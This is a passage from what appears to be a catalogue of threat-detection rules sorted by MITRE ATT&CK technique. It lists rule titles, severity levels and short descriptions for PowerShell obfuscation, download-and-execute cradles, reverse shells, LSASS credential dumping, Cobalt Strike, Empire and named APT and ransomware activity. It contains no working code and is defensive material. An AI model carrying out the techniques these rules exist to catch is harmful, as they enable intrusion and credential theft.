    Description: Detect a system being shutdown or put into different boot mode
attack.t1505 1
Show Rules (1)
  • Cisco Modify Configuration - Level: medium
    Description: Modifications to a config that will serve an adversary's impacts or persistence
attack.s0154 1
Show Rules (1)
  • Default Cobalt Strike Certificate - Level: high
    Description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic
attack.t1568 1
Show Rules (1)
  • Download from Suspicious Dyndns Hosts - Level: medium
    Description: Detects download of certain file types from hosts with dynamic DNS names (selected list)
attack.t1091 1
Show Rules (1)
  • External Disk Drive Or USB Storage Device Was Recognized By The System - Level: low
    Description: Detects external disk drives or plugged-in USB devices.
attack.t1010 1
Show Rules (1)
  • SCM Database Handle Failure - Level: medium
    Description: Detects non-system users failing to get a handle of the SCM database.
attack.s0195 1
Show Rules (1)
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
attack.t1195 1
Show Rules (1)
  • Octopus Scanner Malware - Level: high
    Description: Detects Octopus Scanner Malware.
attack.s0363 1
Show Rules (1)
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IP report
attack.g0080 1
Show Rules (1)
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
attack.s0106 1
Show Rules (1)
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
attack.s0040 1
Show Rules (1)
  • HackTool - Htran/NATBypass Execution - Level: high
    Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
attack.g0022 1
Show Rules (1)
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
attack.g0060 1
Show Rules (1)
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
attack.s0246 1
Show Rules (1)
  • New Firewall Rule Added Via Netsh.EXE - Level: medium
    Description: Detects the addition of a new rule to the Windows firewall via netsh
attack.t1104 1
Show Rules (1)
  • PowerShell DownloadFile - Level: high
    Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
attack.t1622 1
Show Rules (1)
  • PUA - Process Hacker Execution - Level: medium
    Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
attack.s0592 1
Show Rules (1)
  • Renamed Remote Utilities RAT (RURAT) Execution - Level: medium
    Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
attack.g0047 1
Show Rules (1)
  • Suspicious UltraVNC Execution - Level: high
    Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
attack.t1125 1
Show Rules (1)
  • Suspicious Camera and Microphone Access - Level: high
    Description: Detects Processes accessing the camera and microphone from suspicious folder
attack.s0412 1
Show Rules (1)
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the called and well-known function name
attack.g0001 1
Show Rules (1)
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the called and well-known function name
attack.s0013 1
Show Rules (1)
  • Potential PlugX Activity - Level: high
    Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
attack.g0064 1
Show Rules (1)
  • StoneDrill Service Install - Level: high
    Description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
attack.g0030 1
Show Rules (1)
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
attack.g0050 1
Show Rules (1)
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
attack.s0081 1
Show Rules (1)
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
attack.g0027 1
Show Rules (1)
  • APT27 - Emissary Panda Activity - Level: critical
    Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
attack.g0128 1
Show Rules (1)
  • APT31 Judgement Panda Activity - Level: critical
    Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
attack.g0093 1
Show Rules (1)
  • GALLIUM IOCs - Level: high
    Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
attack.t1559 1
Show Rules (1)
  • Trickbot Malware Activity - Level: high
    Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
attack.g0004 1
Show Rules (1)
  • Potential Ke3chang/TidePool Malware Activity - Level: high
    Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
attack.s0575 1
Show Rules (1)
  • Potential Conti Ransomware Activity - Level: critical
    Description: Detects a specific command used by the Conti ransomware group
attack.g0115 1
Show Rules (1)
  • REvil Kaseya Incident Malware Patterns - Level: critical
    Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
attack.g0129 1
Show Rules (1)
  • Potential APT Mustang Panda Activity Against Australian Gov - Level: high
    Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
attack.s0075 1
Show Rules (1)
  • Remote Registry Management Using Reg Utility - Level: medium
    Description: Remote registry management using REG utility from non-admin workstation
attack.t1592 1
Show Rules (1)
  • Account Enumeration on AWS - Level: low
    Description: Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.
attack.t1619 1
Show Rules (1)
  • Potential Storage Enumeration on AWS - Level: medium
    Description: Detects potential enumeration activity targeting AWS storage
attack.t1043 1
Show Rules (1)
  • Possible DNS Rebinding - Level: medium
    Description: Detects DNS-answer with TTL <10.
attack.t1035 1
Show Rules (1)
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
attack.t1050 1
Show Rules (1)
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.

Top MITRE Sub-Techniques

Sub-TechniqueCountRule TitleCount Bar
attack.t1059.001 236
Show Rules (236)
  • Alternate PowerShell Hosts - Image - Level: low
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • Suspicious CLR Logs Creation - Level: high
    Description: Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.
  • Dnscat Execution - Level: critical
    Description: Dnscat exfiltration tool execution
  • Suspicious PowerShell Download - Level: medium
    Description: Detects suspicious PowerShell download command
  • Suspicious PowerShell Invocations - Generic - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • Suspicious PowerShell Invocations - Specific - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • APT29 - Level: high
    Description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
  • Invoke-Obfuscation RUNDLL LAUNCHER - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Rundll32 - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Base64 Encoded Listing of Shadowcopy - Level: high
    Description: Detects base64 encoded listing Win32_Shadowcopy
  • Malicious Base64 Encoded Powershell Invoke Cmdlets - Level: high
    Description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
  • Potential Xor Encoded PowerShell Command - Level: medium
    Description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection
  • PowerShell Execution - Level: medium
    Description: Detects execution of PowerShell
  • AWS EC2 Startup Shell Script Change - Level: high
    Description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
  • File Was Not Allowed To Run - Level: medium
    Description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
  • Invoke-Obfuscation CLIP+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Security - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Security - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Security - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - Security - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Remote PowerShell Sessions Network Connections (WinRM) - Level: high
    Description: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
  • Invoke-Obfuscation CLIP+ Launcher - System - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - System - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - System - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation Via Stdin - System - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation RUNDLL LAUNCHER - System - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Clip - System - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - System - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - System - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Remote Thread Creation Via PowerShell In Uncommon Target - Level: medium
    Description: Detects the creation of a remote thread from a Powershell process in an uncommon target process
  • BloodHound Collection Files - Level: high
    Description: Detects default file names outputted by the BloodHound collection tool SharpHound
  • Malicious PowerShell Scripts - FileCreation - Level: high
    Description: Detects the creation of known offensive powershell scripts used for exploitation
  • Suspicious Interactive PowerShell as SYSTEM - Level: high
    Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
  • PowerShell Core DLL Loaded By Non PowerShell Process - Level: medium
    Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.
  • Suspicious WSMAN Provider Image Loads - Level: medium
    Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
  • Potential Remote PowerShell Session Initiated - Level: high
    Description: Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicates a remote PowerShell connection.
  • Alternate PowerShell Hosts Pipe - Level: medium
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • New PowerShell Instance Created - Level: informational
    Description: Detects the execution of PowerShell via the creation of a named pipe starting with PSHost
  • Nslookup PowerShell Download Cradle - Level: medium
    Description: Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.
  • PowerShell Downgrade Attack - PowerShell - Level: medium
    Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
  • PowerShell Called from an Executable Version Mismatch - Level: high
    Description: Detects PowerShell called from an executable by the version mismatch method
  • Remote PowerShell Session (PS Classic) - Level: low
    Description: Detects remote PowerShell sessions
  • Renamed Powershell Under Powershell Channel - Level: low
    Description: Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.
  • Suspicious PowerShell Download - Level: medium
    Description: Detects suspicious PowerShell download command
  • Suspicious Non PowerShell WSMAN COM Provider - Level: medium
    Description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
  • Alternate PowerShell Hosts - PowerShell Module - Level: medium
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • Bad Opsec Powershell Code Artifacts - Level: critical
    Description: focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.
  • Malicious PowerShell Scripts - PoshModule - Level: high
    Description: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Clip - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Remote PowerShell Session (PS Module) - Level: high
    Description: Detects remote PowerShell sessions
  • Suspicious PowerShell Download - PoshModule - Level: medium
    Description: Detects suspicious PowerShell download command
  • Suspicious PowerShell Invocations - Generic - PowerShell Module - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • Suspicious PowerShell Invocations - Specific - PowerShell Module - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • PowerShell ADRecon Execution - Level: high
    Description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IP report
  • PowerShell Create Local User - Level: medium
    Description: Detects creation of a local user via PowerShell
  • DSInternals Suspicious PowerShell Cmdlets - ScriptBlock - Level: high
    Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
  • Import PowerShell Modules From Suspicious Directories - Level: medium
    Description: Detects powershell scripts that import modules from suspicious directories
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014
  • Invoke-Obfuscation STDIN+ Launcher - Powershell - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Powershell - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Powershell - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Keywords - Level: medium
    Description: Detects keywords from well-known PowerShell exploitation frameworks
  • Powershell MsXml COM Object - Level: medium
    Description: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
  • Malicious Nishang PowerShell Commandlets - Level: high
    Description: Detects Commandlet names and arguments from the Nishang exploitation framework
  • NTFS Alternate Data Stream - Level: high
    Description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
  • PowerShell Web Access Installation - PsScript - Level: high
    Description: Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse
  • PowerView PowerShell Cmdlets - ScriptBlock - Level: high
    Description: Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.
  • PowerShell Credential Prompt - Level: high
    Description: Detects PowerShell calling a credential prompt
  • PSAsyncShell - Asynchronous TCP Reverse Shell - Level: high
    Description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell
  • PowerShell PSAttack - Level: high
    Description: Detects the use of PSAttack PowerShell hack tool
  • PowerShell Remote Session Creation - Level: medium
    Description: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
  • Change PowerShell Policies to an Insecure Level - PowerShell - Level: medium
    Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.
  • PowerShell ShellCode - Level: high
    Description: Detects Base64 encoded Shellcode
  • Malicious ShellIntel PowerShell Commandlets - Level: high
    Description: Detects Commandlet names from ShellIntel exploitation scripts.
  • Potential PowerShell Obfuscation Using Character Join - Level: low
    Description: Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation
  • Suspicious PowerShell Download - Powershell Script - Level: medium
    Description: Detects suspicious PowerShell download command
  • Suspicious PowerShell Invocations - Generic - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • Suspicious PowerShell Invocations - Specific - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • Potential Suspicious PowerShell Keywords - Level: medium
    Description: Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
  • Potential PowerShell Obfuscation Using Alias Cmdlets - Level: low
    Description: Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts
  • Usage Of Web Request Commands And Cmdlets - ScriptBlock - Level: medium
    Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
  • Potential WinAPI Calls Via PowerShell Scripts - Level: high
    Description: Detects use of WinAPI functions in PowerShell scripts
  • WMImplant Hack Tool - Level: high
    Description: Detects parameters used by WMImplant
  • Powershell XML Execute Command - Level: medium
    Description: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
  • Remote LSASS Process Access Through Windows Remote Management - Level: high
    Description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
  • Command Line Execution with Suspicious URL and AppData Strings - Level: medium
    Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
  • Suspicious File Execution From Internet Hosted WebDav Share - Level: high
    Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
  • Cmd.EXE Missing Space Characters Execution Anomaly - Level: high
    Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer).
  • Powershell Executed From Headless ConHost Process - Level: medium
    Description: Detects the use of powershell commands from headless ConHost window. The "--headless" flag hides the windows from the user upon execution.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • HackTool - Covenant PowerShell Launcher - Level: high
    Description: Detects suspicious command lines used in Covenant luanchers
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
  • HackTool - CrackMapExec PowerShell Obfuscation - Level: high
    Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
  • HackTool - Empire PowerShell Launch Parameters - Level: high
    Description: Detects suspicious powershell command line parameters used in Empire
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation CLIP+ Launcher - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
  • Invoke-Obfuscation STDIN+ Launcher - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation Via Stdin - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
  • Execute Code with Pester.bat as Parent - Level: medium
    Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
  • Execute Code with Pester.bat - Level: medium
    Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
  • Detection of PowerShell Execution via Sqlps.exe - Level: medium
    Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
  • SQL Client Tools PowerShell Session Detection - Level: medium
    Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
  • Suspicious Encoded PowerShell Command Line - Level: high
    Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
  • Suspicious PowerShell Encoded Command Patterns - Level: high
    Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
  • PowerShell Base64 Encoded FromBase64String Cmdlet - Level: high
    Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
  • Malicious Base64 Encoded PowerShell Keywords in Command Lines - Level: high
    Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
  • PowerShell Base64 Encoded IEX Cmdlet - Level: high
    Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
  • PowerShell Base64 Encoded Invoke Keyword - Level: high
    Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
  • PowerShell Base64 Encoded Reflective Assembly Load - Level: high
    Description: Detects base64 encoded .NET reflective loading of Assembly
  • Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call - Level: high
    Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
  • PowerShell Base64 Encoded WMI Classes - Level: high
    Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
  • Potential PowerShell Obfuscation Via Reversed Commands - Level: high
    Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine - Level: medium
    Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
  • Potential PowerShell Command Line Obfuscation - Level: high
    Description: Detects the PowerShell command lines with special characters
  • Potential PowerShell Downgrade Attack - Level: medium
    Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
  • PowerShell Web Download - Level: medium
    Description: Detects suspicious ways to download files or content using PowerShell
  • Obfuscated PowerShell OneLiner Execution - Level: high
    Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
  • Potential DLL File Download Via PowerShell Invoke-WebRequest - Level: medium
    Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
  • PowerShell Download Pattern - Level: medium
    Description: Detects a Powershell process that contains download commands in its command line string
  • DSInternals Suspicious PowerShell Cmdlets - Level: high
    Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
  • Suspicious Execution of Powershell with Base64 - Level: medium
    Description: Commandline to launch powershell with a base64 payload
  • Potential Encoded PowerShell Patterns In CommandLine - Level: low
    Description: Detects specific combinations of encoding methods in PowerShell via the commandline
  • Powershell Inline Execution From A File - Level: medium
    Description: Detects inline execution of PowerShell code from a file
  • Certificate Exported Via PowerShell - Level: medium
    Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
  • Base64 Encoded PowerShell Command Detected - Level: high
    Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
  • Suspicious PowerShell IEX Execution Patterns - Level: high
    Description: Detects suspicious ways to run Invoke-Execution using IEX alias
  • Import PowerShell Modules From Suspicious Directories - ProcCreation - Level: medium
    Description: Detects powershell scripts that import modules from suspicious directories
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Non Interactive PowerShell Process Spawned - Level: low
    Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
  • Potential PowerShell Obfuscation Via WCHAR - Level: high
    Description: Detects suspicious encoded character syntax often used for defense evasion
  • Execution of Powershell Script in Public Folder - Level: high
    Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
  • Potential Powershell ReverseShell Connection - Level: high
    Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
  • Suspicious PowerShell Invocation From Script Engines - Level: medium
    Description: Detects suspicious powershell invocations from interpreters or unusual programs
  • Change PowerShell Policies to an Insecure Level - Level: medium
    Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
  • Exchange PowerShell Snap-Ins Usage - Level: high
    Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
  • Suspicious PowerShell Download and Execute Pattern - Level: high
    Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
  • Suspicious PowerShell Parameter Substring - Level: high
    Description: Detects suspicious PowerShell invocation with a parameter substring
  • Suspicious PowerShell Parent Process - Level: high
    Description: Detects a suspicious or uncommon parent processes of PowerShell
  • PowerShell Script Run in AppData - Level: medium
    Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
  • PowerShell DownloadFile - Level: high
    Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
  • Net WebClient Casing Anomalies - Level: high
